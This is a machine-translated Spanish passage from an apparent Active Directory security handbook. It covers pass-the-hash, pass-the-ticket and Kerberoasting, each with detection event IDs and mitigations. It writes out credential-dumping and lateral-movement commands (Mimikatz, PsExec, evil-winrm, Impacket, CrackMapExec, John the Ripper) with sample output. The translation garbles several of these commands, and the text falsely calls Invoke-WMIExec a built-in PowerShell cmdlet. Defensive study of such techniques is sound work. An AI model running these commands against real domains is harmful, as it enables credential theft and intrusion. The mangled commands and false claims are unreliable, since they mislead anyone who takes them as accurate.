Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Guía de seguridad de Active Directory
El directorio activo completo
Manual de seguridad
Estrategias de explotación, detección y mitigación
Machine Translated by Google
Tabla de contenido
03 Introducción
04 Directorio Activo
05 Técnica de ataque 1:
Uso de métodos de autenticación alternativos (T1550)
dieciséis
Técnica de ataque 2:
Kerberoasting
23 Técnica de ataque 3:
Ataque del billete dorado
28 Técnica de ataque 4:
DCShadow Attack
32 Técnica de ataque 5:
ASREP Tueste
37 Técnica de ataque 6:
Ataque de inyección LDAP
42 Técnica de ataque 7:
Ataque de retransmisión NTLM de PetitPotam en un directorio activo
Servicios de certificados (AD CS)
47 Conclusión
48 Referencias
El manual completo de seguridad de Active Directory 2
Machine Translated by Google
Introducción
Active Directory (AD), introducido con Windows 2000 [1], se ha convertido en una parte integral de las
organizaciones modernas, sirviendo como columna vertebral de la infraestructura de identidad para el 90% de las
empresas Fortune 1000 [2]. Active Directory es ampliamente utilizado por las organizaciones por su simplicidad y
enfoque de administración centralizada. Es una solución atractiva para las empresas, ya que facilita a los empleados
el acceso a recursos y aplicaciones con un único conjunto de credenciales, lo que aumenta la productividad y la
eficiencia [3]. Además, su estructura de administración centralizada brinda un único punto de control para los
administradores de TI, lo que les permite administrar usuarios, computadoras y acceso a los recursos en un solo
lugar [4].
Sin embargo, debido a su uso generalizado y a las limitaciones arquitectónicas, Active Directory se convierte en una
responsabilidad en caso de una violación de la seguridad y se convierte en un objetivo prioritario para los
adversarios que buscan elevar los privilegios, infectar múltiples sistemas y lanzar ataques devastadores como la
exfiltración de datos, el sistema completo. compromisos y ransomware.
Los mayores desafíos en la recuperación después de una infracción de AD incluyen la identificación de la
fuente, la determinación del alcance del daño y la creación de un nuevo entorno seguro. Según el Informe de
investigaciones de filtraciones de datos de 2022 de Verizon [5], el 80 % de las filtraciones provienen de agentes
externos y, como señala el Informe de costos de filtraciones de datos de IBM de 2021, una vez que se piratea
un administrador de dominio, los atacantes pueden ocultarse dentro de su red hasta por 277 días antes
de la detección, lo que representa una amenaza significativa [6].
El uso generalizado y la facilidad de acceso a los recursos para los empleados hacen que sea un desafío para las
organizaciones retirar Active Directory (AD) obsoleto y adoptar alternativas más seguras como Microsoft Azure
Active Directory (AAD). La transición a AAD soluciona algunas de las limitaciones de AD mediante la automatización
de tareas administrativas, como la gestión de usuarios y la asignación de miembros de grupos, para
mejorar la eficiencia [7]. Sin embargo, aún se aplican los mismos riesgos de seguridad, ya que un compromiso de
la infraestructura de identidad puede tener consecuencias devastadoras.
Los adversarios también pueden explotar Microsoft Endpoint Manager para pasar lateralmente de un arrendatario
de Azure a un dominio de AD local, creando rutas de ataque entre entornos de administración de
identidad separados [8].
La importancia de la seguridad de Active Directory no se puede exagerar, y las organizaciones deben estar
preparadas con planes de recuperación ante desastres y un monitoreo atento para detener los ataques antes de
que el sistema se dañe o se vuelva irreparable. La elección entre AD y AAD dependerá en gran medida de las
necesidades y los recursos de la organización, pero el riesgo de compromiso permanece independientemente de la
elección. El uso seguro y efectivo de Active Directory requiere una comprensión clara de los riesgos
potenciales y un compromiso con las prácticas y protocolos de seguridad.
El manual completo de seguridad de Active Directory 3
Machine Translated by Google
Directorio Activo
Active Directory (AD) es un servicio de directorio crucial para administrar recursos de red en redes
basadas en Windows. Permite la centralización de la administración de varios recursos de red,
incluidas las cuentas de usuario y de computadora, los recursos y las políticas de seguridad. De esta
forma, AD facilita la gestión eficiente y segura de las redes en una estructura jerárquica.
AD opera en una estructura jerárquica que consta de dominios en el nivel superior y varios objetos anidados
dentro, como usuarios, computadoras y grupos. La estructura está diseñada para proporcionar una forma
organizada y eficiente de administrar los recursos de la red y garantiza que las políticas de seguridad se
apliquen de manera uniforme en toda la red.
AD utiliza el Protocolo ligero de acceso a directorios (LDAP) para la comunicación entre dominios y
controladores de dominio. LDAP es un protocolo de servicio de directorio que permite la gestión de
servicios de directorio distribuidos a través de una red IP. Además, AD emplea Kerberos, un protocolo
de autenticación seguro para la autenticación en una red.
Esto garantiza que solo los usuarios y las computadoras autorizados puedan acceder a los recursos de la
red, lo que mejora la seguridad de la red.
Para administrar los recursos de la red de manera eficiente, Active Directory utiliza objetos de directiva
de grupo (GPO). Los GPO se utilizan para controlar y hacer cumplir las políticas de seguridad, la
implementación de software y otras tareas administrativas en toda la red. AD también brinda soporte para
llamadas a procedimientos remotos (RPC), lo que permite la administración remota de los recursos de
la red. Esto garantiza que los administradores de red puedan administrar de manera eficiente los recursos
de la red desde una ubicación centralizada, independientemente de la ubicación de los propios recursos.
Sin embargo, Active Directory no es inmune a los ataques, y los ataques a AD pueden tener
consecuencias desastrosas para la red. Los ataques exitosos de Active Directory consisten en tres pasos
principales: descubrimiento, escalada de privilegios mediante el robo de credenciales de cuenta
válidas y obtener acceso a otras computadoras en la red/dominio. Una vez que los atacantes se
afianzan en la red de destino, inmediatamente cambian su enfoque para obtener un acceso elevado a
sistemas adicionales que los ayudarán a lograr su objetivo final, como cifrar y exfiltrar datos de la
organización.
En resumen, Active Directory es un componente vital para administrar y proteger los recursos de red en
redes basadas en Windows. Su estructura jerárquica y varias funciones, como LDAP y Kerberos, GPO y
RPC, brindan una administración eficiente y segura de los recursos de la red. Para mantener su red segura,
es fundamental proteger Active Directory de los ataques implementando medidas de seguridad
sólidas y manteniendo los protocolos de seguridad actualizados para evitar el acceso no autorizado a los
recursos de la red.
El manual completo de seguridad de Active Directory 4
Machine Translated by Google
Técnica de ataque 1:
Uso de autenticación alternativa
Métodos (T1550)
Los ataques adversarios en un sistema a menudo pueden eludir los controles de acceso normales mediante
el uso de materiales de autenticación alternativos, como hash de contraseñas, vales de Kerberos y tokens
de acceso a aplicaciones. Esta técnica, conocida como T1550 en el marco MITRE ATT&CK, permite a los
atacantes moverse lateralmente dentro de un entorno y obtener acceso no autorizado.
Esta sección proporcionará una descripción detallada de dos subtécnicas de la técnica Usar métodos de
autenticación alternativos (T1150): PasstheHash (T1550.002) y PasstheTicket
(T1550.003).
Pasar el hachís (T1550.002)
PasstheHash (PtH) es un ataque basado en la identidad que aprovechan los atacantes para obtener
acceso a sistemas y privilegios adicionales dentro de una red una vez que ya han comprometido el
sistema.
En un escenario típico de PasstheHash, los adversarios
• obtener acceso inicial a una red de destino,
• roba/descarga credenciales de usuario "hash",
• usa credenciales volcadas
para crear una nueva sesión de usuario en el host comprometido.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 5
Machine Translated by Google
A diferencia de otros ataques, los ataques PasstheHash representan una forma única de robo de credenciales
en la que un atacante aprovecha el protocolo de autenticación de Windows New Technology LAN Manager
(NTLM) para autenticarse en un sistema remoto utilizando el hash calculado previamente de un contraseña del
usuario. Cuando un usuario inicia sesión en un sistema Windows que se basa en el protocolo NTLM, el sistema
genera un hash NTLM de la contraseña del usuario sin aprovechar una técnica llamada salting que mejora la
seguridad de las contraseñas hash almacenadas en servidores y controladores de dominio.
Un hash es una salida digerida única de una función matemática unidireccional que toma una entrada de
varios tamaños (puede ser tan larga como una novela clásica o tan corta como una contraseña de 8
dígitos) y devuelve una cadena de caracteres de tamaño fijo. Como estas funciones están
diseñadas para ser unidireccionales, lo que significa que al tener una salida, debería ser computacionalmente
inviable para un adversario revertir la salida, es decir, para obtener la entrada de texto sin cifrar, el
hashing de contraseñas sigue siendo una práctica de seguridad frecuente contra la violación de datos. ataques
NTLM es un método de inicio de sesión único que utiliza un sistema de desafío y respuesta para verificar la
identidad del usuario sin solicitar la contraseña del usuario. Por lo tanto, esta técnica de ataque no requiere que
los adversarios utilicen herramientas de craqueo de terceros, ya que no se necesita la versión de texto sin formato
de la contraseña; por lo tanto, elimina la necesidad de realizar operaciones de craqueo que consumen
mucho tiempo.
Si un atacante obtiene el hash NTLM de la contraseña de un usuario a través de medios como extraerlo de la
memoria lsass.exe o del archivo %systemroot%\system32\config\SAM , capturarlo durante las transmisiones de
red o descargarlo de una copia de seguridad o una imagen de un sistema, pueden utilizar la contraseña hash
pasando el hash a un sistema remoto que reconozca la cuenta del usuario comprometido. Según los privilegios
y el nivel de acceso del usuario comprometido, los adversarios pueden obtener acceso completo al
sistema y realizar con éxito ataques de movimiento lateral.
Es importante tener en cuenta que esto no es una vulnerabilidad, sino una elección de diseño
deliberada destinada a reducir la fricción y mejorar la experiencia general del usuario.
Herramientas y Técnicas para Realizar Ataques PasstheHash
Los ataques PasstheHash (PtH) se pueden ejecutar utilizando varias herramientas disponibles públicamente,
como Mimikatz [9] y evilwinrm [10], así como cmdlets integrados de PowerShell . Los atacantes a menudo
emplean estas herramientas o comandos para extraer el hash de la memoria de un sistema
comprometido y luego lo usan para obtener acceso a otros sistemas en la red.
Herramienta 1: Mimikatz
El uso de Mimikatz para el ataque PasstheHash consta de tres pasos principales.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 6
Machine Translated by Google
Paso 1: Robar el hash de la contraseña
Para volcar una lista de los usuarios que iniciaron sesión recientemente y sus credenciales del sistema operativo, los
adversarios a menudo usan el módulo sekurlsa en Mimikatz, que aprovecha una serie de técnicas diferentes
para extraer información de autenticación de la memoria LSASS , incluido el análisis de estructuras de memoria y el uso
de API de Windows. La función "contraseñas de inicio de sesión" de este módulo extrae específicamente los datos de la
sesión de inicio de sesión, como hashes de contraseña guardados y credenciales almacenadas en caché. Esto puede
incluir la información de inicio de sesión del usuario actual, así como la información de otros usuarios que han iniciado
sesión en la misma máquina.
Tenga en cuenta que antes de aprovechar el comando sekurlsa::logonpasswords , los atacantes deben ejecutar el
comandoprivilegio::debug para que Mimikatz pueda ejecutarse correctamente.
De forma predeterminada, LSASS se ejecuta con alta integridad y está protegido contra la depuración por
parte de procesos no autorizados. Sin embargo, al habilitar el privilegio del depurador, el atacante puede eludir
esta protección y acceder a la memoria LSASS para extraer los datos de la sesión de inicio de sesión.
A continuación, encontrará un ejemplo de salida del paso uno.
PD> .\mimikatz.exe "privilegio::depuración" "sekurlsa::contraseñas de inicio de sesión"
ID de autenticación: 0; 302247 (00000000:00049ca7)
Sesión : UndefinedLogonType desde 0
Nombre de usuario : Alicia
Dominio : DOMINIO
Servidor de inicio de sesión : DC1
Hora de inicio de sesión : 01/12/2023 15:13:19
S.I.D. : S152135010402953816137123306976571109
msv:
[00000003] Primaria
* Nombre de usuario: Alicia
* Dominio : DOMINIO
* NTLM : a0c8746a6efc7782c7c19c55185145be
Con este hash NTLM, es hora de que los adversarios salten a la segunda etapa.
Es importante tener en cuenta que Mimikatz no es la única forma de volcar hashes NTLM. Los adversarios a menudo
aprovechan otras aplicaciones de línea de comandos integradas o herramientas de terceros, como ProcDump
[11] y Gsecdump [12], para el volcado de credenciales.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 7
Machine Translated by Google
Paso 2: Autenticación a través del hash de la contraseña robada
Este es el paso principal donde el adversario pasa el hash para hacerse pasar por el usuario y obtener
acceso al sistema remoto.
El comando "sekurlsa::pth" en Mimikatz es una función que facilita los ataques "PasstheHash".
Esta técnica permite que un atacante se autentique en un sistema remoto utilizando un hash NTLM
capturado de la contraseña de un usuario, sin necesidad de la contraseña real. Para ejecutar este
comando, el atacante debe proporcionar solo los siguientes parámetros:
• /usuario: (el nombre de usuario),
• /domain: (el nombre de dominio), y
• /ntlm: (el hash NTLM de la contraseña del usuario).
Tenga en cuenta que las contraseñas de Windows no solo se limitan al protocolo NTLM, sino que también
pueden usar algoritmos de cifrado de bloques populares como AES128 y AES256 para el
almacenamiento de contraseñas. En tales casos, los adversarios tendrían que usar los
parámetros /aes128: o /aes256: en lugar de /ntlm:.
PS> .\mimikatz.exe "sekurlsa::pth /usuario:Alice /dominio:dominio.com
/ntlm:a0c8746a6efc7782c7c19c55185145be"
usuario : Alicia
dominio: dominio.com
programa: cmd.exe
imper. : No
NTLM : a0c8746a6efc7782c7c19c55185145be
. . .
Observe con qué facilidad obtuvimos acceso a un sistema remoto sin conocer solo el nombre de usuario
y el hash NTLM de la contraseña de la víctima.
Paso 3: Acceder a los recursos a través de una nueva cuenta de usuario
En el tercer paso, el atacante utiliza la cuenta de usuario recién obtenida para expandir su acceso a la
red. Por ejemplo, el adversario puede usar una utilidad de línea de comandos llamada PsExec para
realizar la ejecución remota de código en otro host.
Por ejemplo, el atacante puede ejecutar el siguiente comando para ejecutar el proceso "cmd.exe" en la
máquina remota con una dirección IP interna "192.168.52.146":
psexec.exe \\192.168.52.146 cmd.exe
Mimikatz no es la única forma de realizar un ataque PasstheHash. Los adversarios a menudo también
usan PowerShell .
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 8
Machine Translated by Google
Herramienta 2: PowerShell
Es común que los adversarios usen el cmdlet InvokeWMIExec , que permite la ejecución de comandos
arbitrarios en una máquina Windows remota usando WMI (Instrumentación de administración de
Windows), para realizar un ataque PtH.
Tenga en cuenta que InvokeWMIExec es un cmdlet de PowerShell integrado que está presente
en muchos sistemas Windows recientes. Esta característica permite la ejecución de comandos
arbitrarios en una máquina Windows remota a través de Instrumental de administración de Windows (WMI).
Puede ejecutar InvokeWMIExec directamente desde un indicador de PowerShell o integrarlo en un
script de PowerShell.
Al ser un cmdlet integrado, el ataque mediante InvokeWMIExec es más encubierto, ya que no
requiere descargas ni instalaciones adicionales.
Por ejemplo, si tiene un hash de contraseña del usuario llamado Alice de nuestro escenario anterior, un
adversario puede ejecutar el siguiente comando.
InvocarWmiExec objetivo 192.168.52.146 hash a0c8746a6efc7782c7c19c55185145be
nombre de usuario Alice nombre de host del comando
En el comando anterior, un adversario usa el script InvokeWmiExec para ejecutar el comando "nombre de host"
en la máquina remota con la dirección IP interna 192.168.52.146.
Herramienta 3: evilwinrm
La herramienta "evilwinrm" es una joya de Ruby que permite la ejecución de comandos remotos en una
máquina con Windows utilizando el protocolo de administración remota de Windows (WinRM). Como evilwinrm
no es una herramienta integrada, los adversarios deben instalarla antes de usarla. Varias opciones de
instalación están disponibles en el repositorio de GitHub correspondiente [10].
En un ataque PasstheHash usando evilwinrm, el atacante especifica el nombre de usuario, el hash
NTLM y la dirección IP del sistema de destino como parámetros en el comando evilwinrm [14].
Por ejemplo, el siguiente comando se puede usar para realizar un ataque PtH en una máquina Windows
con la dirección IP 192.168.52.146, usando el nombre de usuario "Alice" y el hash NTLM
"a0c8746a6efc7782c7c19c55185145be" :
malganarrm u Alicia H a0c8746a6efc7782c7c19c55185145be i 192.168.52.146
Con esta información, evilwinrm establece una conexión remota con el sistema de destino y se autentica
como el usuario especificado (Alice), lo que permite al atacante ejecutar comandos arbitrarios en la
máquina remota.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 9
Machine Translated by Google
Métodos de detección para el ataque Pass the Hash
A continuación, se agregan ID de eventos conocidos para detectar un posible ataque PasstheHash [15], [16], [17], [18]:
Id. de evento 1 : creación del proceso.
• Campos de descripción clave: LogonId, ParentProcessId, ParentImage, CurrentDirectory,
CommandLine, IntegrityLevel, ParentCommandLine, ParentCommandLine, UtcTime,
ProcessId, Usuario, Hashes, Imagen
Id. de evento 5 : proceso finalizado.
• Campos de descripción clave: UtcTime, ProcessId:, Image
Id. de evento 10 : se accedió al proceso.
• Campos de descripción clave: SourceThreadId, TargetProcessId, GrantedAccess,
Imagen de origen, Imagen de destino
Id. de evento 4624 : se inició sesión correctamente en una cuenta.
• Campos de descripción clave: Nombre de la cuenta, Dominio de la cuenta, ID de inicio de sesión
Id. de evento 4663 : se intentó acceder a un objeto.
• Campos de descripción clave: ID de proceso, Máscara de acceso, Dominio de cuenta, Nombre de objeto,
Nombre de proceso, Tipo de objeto, ID de inicio de sesión, ID de identificador
Id. de evento 4672 : privilegios especiales asignados al nuevo inicio de sesión.
• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta
Id. de evento 4688 : se ha creado un nuevo proceso.
• Campos de descripción clave: etiqueta obligatoria, dominio de la cuenta, nombre del proceso de origen, nuevo
Nombre del proceso, Tipo de escalada de token, ID de proceso nuevo, ID de proceso de origen
Técnicas de mitigación para el ataque Pass the Hash
Para mitigar el riesgo de ataques passthehash, las organizaciones pueden emplear varias medidas técnicas. Una de esas
medidas es habilitar Credential Guard de Windows Defender, una característica que se introdujo en Windows 10 y Windows
Server 2016. Esta herramienta aprovecha la virtualización para asegurar el almacenamiento de credenciales y
restringir el acceso solo a procesos confiables.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 10
Machine Translated by Google
Otra medida es revocar los privilegios de administrador de las estaciones de trabajo de los usuarios. Esto
limita la capacidad de un atacante para ejecutar malware y extraer hashes de LSASS.exe. Además,
limitar la cantidad de puntos finales en los que los usuarios tienen privilegios administrativos y evitar los
privilegios administrativos a través de los límites de seguridad reduce el riesgo de que se use una
credencial comprometida para escalar privilegios.
Aleatorizar y almacenar contraseñas de administradores locales con una solución como Local
Administrator Password Solution (LAPS) de Microsoft también agrega una capa adicional de seguridad,
ya que reduce la capacidad de un atacante de moverse lateralmente con cuentas locales que
comparten la misma contraseña. También se recomienda evitar que las cuentas locales se autentiquen a
través de la red, lo que se puede lograr mediante el uso de SID conocidos en las políticas de grupo.
Pase el boleto (T1550.003)
Pass the Ticket (PtT) es una técnica que permite a un atacante utilizar un vale de concesión de vales
de Kerberos adquirido previamente. El TGT es un componente crucial del protocolo Kerberos, ya que
permite que un usuario se autentique en múltiples sistemas sin tener que ingresar su contraseña
cada vez.
El vale de concesión de vales (TGT) es un tipo de vale emitido por el controlador de dominio (DC)
a un usuario tras una autenticación exitosa en el dominio. Incluye información crucial, como
la clave de sesión del usuario, la pertenencia al grupo y los privilegios, que se utilizan para solicitar
vales de servicio para servicios específicos en los sistemas de destino. Kerberos cifra el TGT
utilizando el hash de la contraseña del usuario y emplea algoritmos de cifrado simétricos (como DES
o AES) según la configuración del entorno de Kerberos. Después del cifrado, el TGT se envía
a la computadora del usuario y se almacena en la memoria.
Cuando el usuario quiere acceder a un recurso en otro sistema, utiliza el TGT para solicitar un
ticket de servicio al DC. El ticket de servicio también está encriptado con la clave de sesión del
usuario y contiene una clave de sesión encriptada que se puede usar para
autenticarse en el sistema de destino . Luego, el ticket de servicio se envía a la cuenta del usuario.
computadora, donde se utiliza para autenticarse en el sistema de destino.
Al tener una clave TGT robada, un adversario puede solicitar un ticket de servicio del DC para un
servicio específico en un sistema de destino para obtener acceso a sus recursos.
Herramientas y técnicas para realizar ataques PasstheTicket
Los ataques PasstheTicket (PtH) se pueden ejecutar utilizando varias herramientas disponibles
públicamente, como Mimikatz, Kekeo [19], Rubeus [20], Creddump7 [21], etc. Los atacantes suelen
emplear estas herramientas para extraer Kerberos TGT de la memoria de un sistema comprometido y
luego usarlos para obtener acceso a otros sistemas en la red.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 11
Machine Translated by Google
Herramienta 1: Mimikatz
El uso de Mimikatz para el ataque PtT consta de cuatro pasos principales.
Paso 1: captura de tickets de Kerberos para cuentas válidas
Un atacante puede usar el comando sekurlsa::tickets Mimikatz con el parámetro /export para extraer
todos los tickets de Kerberos de la memoria y guardarlos como archivos .kirbi y guardarlos en la misma
carpeta donde se encuentra el archivo ejecutable de Mimikatz.
Al examinar los nombres de los archivos .kirbi , es posible determinar si hay vales de Kerberos
para un administrador de dominio, como DOMAIN\Alice:
PD> mimikatz.exe "privilegio::depuración" "sekurlsa::entradas /exportación"
PD>dir | encontrar "Alicia" | findstr "krbtgt"
...
[0;1e4c7df]2040e10000Alice@krbtgtDOMINIO.COM.kirbi
...
El segundo comando, dir | encontrar "Alicia" | findstr "krbtgt", enumera todos los archivos en el
directorio actual y canaliza la salida al comando findstr para buscar el texto "krbtgt". El propósito de
este comando es encontrar los archivos de ticket de Kerberos relacionados con el usuario "Alice",
que pueden incluir la cadena "krbtgt" en el nombre del archivo.
Tenga en cuenta que Mimikatz no es la única herramienta para obtener tickets de Kerberos. Los
adversarios pueden emplear la herramienta Rubeus [20] para generar tráfico ASREQ sin procesar para solicitar un TGT
con un nombre de usuario y contraseña proporcionados. La ventaja de este ataque es que el
la contraseña proporcionada a Rubeus se puede cifrar en algoritmos RC4, DES y AES ,
y el ataque aún funcionaría [22].
Paso 2: Reutilizar el ticket
Este es el paso principal del ataque PasstheTicket.
En este paso, el atacante emplea el comando Mimikatz kerberos::ptt para insertar el TGT obtenido en su
propia sesión, lo que hace que su sesión adquiera la identidad y los permisos .
del TGT robado para el acceso futuro a los recursos sin conocer las credenciales de texto sin formato.
Esto permite que el adversario acceda a recursos que de otro modo estarían protegidos por la
autenticación Kerberos [23].
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 12
Machine Translated by Google
PD> mimikatz.exe "kerberos::ptt
C:\KerberosTickets\[0;1e4c7df]2040e10000Alice@krbtgtDOMAIN.COM.kirbi"
* Archivo:
'C:\KerberosTickets\[0;1e4c7df]2040e10000joed@krbtgtDOMAIN.COM.kirbi': OK
Tenga en cuenta que el comando anterior se utiliza para insertar el vale de concesión de vales de Kerberos
(TGT) almacenado en el archivo .kirbi correspondiente en la sesión actual.
Para asegurarse de que se inyectó el ticket correcto, un adversario puede usar "kerberos::list"
Comando Mimikatz .
PD> mimikatz.exe "kerberos::list"
[00000000] 0x00000012 aes256_hmac
Inicio/Fin/MaxRenew: 13/01/2022 09:47:44 ; 13/01/2022 09:47:44 ; 13/01/2022
09:47:44
Nombre del servidor : krbtgt/DOMINIO.COM @ DOMINIO.COM
nombre del cliente : Alicia @ DOMINIO.COM
Banderas 40e10000 : nombre_canonicalizar; pre_auténtico; inicial ; renovable;
reenviables;
Es importante mencionar que el TGT tiene una vida útil finita y expirará después de un cierto período
de tiempo. El usuario deberá volver a autenticarse en el dominio para obtener un nuevo TGT.
Paso 3: Descubrir los privilegios del billete robado
Una vez que un ticket obtenido está listo para su reutilización, el atacante necesita identificar sus capacidades, es
decir, dónde se puede utilizar. Un TGS solo puede proporcionar acceso al recurso específico para el que se emitió,
y el atacante puede encontrar esa información examinando el TGS.
Para usar un TGT, es posible que el atacante deba realizar una fase de descubrimiento interno para averiguar el
acceso que otorga. Esto puede ser tan simple como verificar las membresías del grupo del usuario y
buscar señales claras.
Se pueden emplear numerosas herramientas para recopilar información sobre Active Directory.
Sin embargo, un atacante también puede usar comandos integrados como "net" para recopilar
dicha información sin alertar a los controles de seguridad.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 13
Machine Translated by Google
PD> usuario de red Alice/dominio
La solicitud se procesará en un controlador de dominio para el dominio dominio.com.
Nombre de usuario Alicia
Nombre completo alicia oswell
Comentario
comentario del usuario
Código de país/región 000 (predeterminado del sistema)
cuenta activa Sí
La cuenta caduca Nunca
. . .
Membresías de grupos locales
Membresías de grupos globales *Administradores de estaciones de trabajo *VPNusuario
*FileServer1_PublicShare *Usuarios de dominio
El comando se completó con éxito.
Paso 4: Acceder a los recursos a través de una nueva cuenta de usuario
Por último, el atacante puede emplear las utilidades integradas del sistema lateralmente de una manera sigilosa por lo que
operativo para intentar obtener acceso a otros recursos y promover sus objetivos. Por ejemplo, el adversario podría
aprovechar la utilidad de línea de comandos PsExec para ejecutar powershell.exe en una estación de trabajo
remota.
Métodos de detección para el ataque Pass the Ticket
A continuación, se agregan ID de eventos conocidos para detectar un posible ataque PasstheTicket [15], [16]:
Id. de evento 4768 : se solicitó un vale de autenticación Kerberos (TGT).
• Campos de descripción clave: nombre de la cuenta, nombre del servicio (siempre "krbtgt"), ID del servicio,
Dirección del cliente
Id. de evento 4769 : se solicitó un vale de servicio de Kerberos.
• Campos de descripción clave: nombre de la cuenta, nombre del servicio, dirección del cliente
Id. de evento 4770 : se renovó un vale de servicio de Kerberos.
• Campos de descripción clave: nombre de cuenta, ID de usuario, nombre de servicio, ID de servicio
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 14
Machine Translated by Google
Técnicas de mitigación para el ataque Pass the Ticket
Las medidas efectivas para contrarrestar los ataques passthehash se concentran en hacer que los
boletos sean más difíciles de robar y limitar el impacto potencial de un boleto robado. Una de esas
medidas es utilizar Windows Defender Credential Guard de Microsoft. Esta tecnología, que se
introdujo en Windows 10 y Windows Server 2016, aprovecha la virtualización para asegurar el
almacenamiento de credenciales y brindar acceso solo a procesos confiables.
Otro paso importante es limitar la cantidad de puntos finales donde los usuarios tienen privilegios
administrativos. Esto reduce significativamente el riesgo de que un atacante use un boleto robado para
el movimiento lateral. También es importante evitar otorgar privilegios administrativos a través de los
límites de seguridad, ya que esto reduce en gran medida el riesgo de que un atacante utilice un ticket
robado para escalar sus privilegios.
Técnica de ataque 1: uso de métodos de autenticación alternativos (T1550) 15
Machine Translated by Google
Técnica de ataque 2:
Kerberoasting
Kerberoasting es una técnica utilizada para obtener hash de contraseñas para cuentas de usuario de Active
Directory (AD) que tienen valores servicePrincipalName (SPN).
En entornos de AD, los SPN se registran en cuentas de usuario o de computadora, conocidas como "cuentas
de servicio". Estas cuentas se utilizan para ejecutar servicios y aplicaciones, y generalmente son necesarias para
servidor, mínimoprivilegio realizar su función. Cuando un cliente solicita un servicio otorgado de un
emplea el SPN para ubicar la cuenta de servicio vinculada con el servicio. Luego, el cliente se autentica en
el servicio utilizando las credenciales de la cuenta de servicio, que se almacenan como un hash de contraseña en
AD.
En el caso de Kerberoasting, un atacante puede explotar el valor SPN de una cuenta de servicio para solicitar
un ticket de servicio (TGS). El ticket TGS se puede cifrar (a través de RC4) con el hash de contraseña de la cuenta
de servicio asignada al SPN solicitado como clave. Esto significa que un atacante que captura tickets TGS en el
tráfico de la red o los extrae de la memoria puede extraer el hash de la contraseña de la cuenta de servicio
y realizar un ataque de fuerza bruta fuera de línea para recuperar la contraseña de texto sin formato.
Técnica de ataque 2: Kerberoasting dieciséis
Machine Translated by Google
Tenga en cuenta que los ataques Kerberoasting y PasstheTicket son dos técnicas diferentes que se utilizan
para robar o suplantar credenciales válidas en un entorno Kerberos.
Kerberoasting es un método para obtener credenciales de cuentas de servicio solicitando vales de
servicio de un controlador de dominio y descifrándolos sin conexión. Permite al atacante obtener
acceso a los recursos de la red utilizando el hash de la contraseña de la cuenta de servicio.
PasstheTicket, por otro lado, es una técnica en la que un atacante roba un vale de concesión de vales
(TGT) de Kerberos de la sesión de un usuario y lo utiliza para hacerse pasar por el usuario y obtener
acceso a los recursos de la red.
Los ataques de Kerberoasting se pueden ejecutar utilizando varias herramientas y utilidades disponibles
públicamente, como los scripts de Impacket.
Herramientas y técnicas para realizar Kerberoasting
Para este ataque, no se utiliza una sola herramienta, sino una colaboración de ellas, como Mimikatz, Rubeus,
Impacket, John the Ripper, Hashcat.
Herramienta 1: paquete de impacto
El ataque Kerberoasting que aprovecha el script de Impacket consta de tres partes principales.
Paso 1: Identificar los SPN y solicitar los TGS
El primer paso en los ataques de Kerberoasting es enumerar (o identificar) servicePrincipalNames
y solicitar billetes de servicio (TGS).
El script de Impacket GetUserSPNs (Python) puede realizar todos los pasos necesarios para solicitar un ST para
un servicio dado su SPN y credenciales de dominio válidas [24]:
# con una contraseña
GetUserSPNs.py outputfile kerberoastables.txt dcip $KeyDistributionCenter
'DOMINIO/USUARIO:Contraseña'
# con un hash NT
GetUserSPNs.py archivo de salida kerberoastables.txt hashes 'LMhash:NThash' dcip
$KeyDistributionCenter 'DOMINIO/USUARIO'
El comando anterior utiliza el script GetUserSPNs.py y especifica un archivo de salida,
"kerberoastables.txt", donde se almacenarán los hash de contraseña obtenidos.
El indicador dcip para especificar la dirección IP del controlador de dominio y el indicador outputfile para
especificar dónde se guardarán los hash de contraseña obtenidos. También utiliza el
argumento 'DOMINIO/USUARIO:Contraseña' o 'DOMINIO/USUARIO' para proporcionar el dominio, nombre de
usuario y contraseña/hash NT de un usuario de dominio válido para solicitar el ST.
Técnica de ataque 2: Kerberoasting 17
Machine Translated by Google
Tenga en cuenta que los adversarios también pueden aprovechar la herramienta CrackMapExec (CME) para
realizar Kerberoasting en una lista de sistemas especificados por $TARGETS [24].
crackmapexec ldap $OBJETIVOS u $USUARIO p $CONTRASEÑA kerberoasting
kerberoastables.txt kdcHost $KeyDistributionCenter
El comando anterior usa el indicador kerberoasting para especificar un archivo de salida para guardar los hashes
de contraseña obtenidos y el indicador kdcHost para especificar la dirección IP del dominio.
Paso 2: Descifrado fuera de línea del hash
Habiendo robado contraseñas en el archivo kerberoastables.txt , el adversario puede realizar un ataque de fuerza bruta fuera de
línea para obtener la contraseña de texto sin formato utilizando herramientas de terceros, como John the Ripper y Hashcat.
john format=krb5tgs wordlist=$lista de palabras kerberoastables.txt
El comando anterior usa el indicador format=krb5tgs para especificar que los valores hash en el archivo "kerberoastables.txt"
están en el formato de Kerberos 5 TGS (Ticket Granting Service) y
indicador de lista de palabras para especificar la ubicación del archivo de lista de palabras que se usará en el proceso de
descifrado. Una vez que se ejecuta el comando, John intentará encontrar una coincidencia entre los hash de la contraseña y
las palabras en el archivo de la lista de palabras.
Paso 3: Uso de nuevos privilegios para promover objetivos
Una vez que se ha descifrado la contraseña, el atacante puede usar las credenciales de la cuenta de servicio para acceder a los
recursos de la red y promover sus objetivos. Esto puede incluir la filtración de datos, el movimiento lateral dentro de la red o la
escalada de sus privilegios.
Herramienta 2: Rubius
El ataque Kerberoasting que aprovecha Rubeus consta de cuatro partes principales.
Paso 1: enumerar servicePrincipalNames
El primer paso de un ataque Kerberoasting es identificar y enumerar los nombres principales de servicio (SPN) de las cuentas de
servicio de destino con los privilegios deseables.
Por esta razón, los adversarios pueden desarrollar filtros LDAP personalizados para buscar usuarios con valores de SPN
registrados para el dominio actual [25].
Técnica de ataque 2: Kerberoasting 18
Machine Translated by Google
$ldapFiltro =
"(&(objectClass=usuario)(objectCategory=usuario)(servicePrincipalName=*))"
$dominio = NuevoObjeto System.DirectoryServices.DirectoryEntry
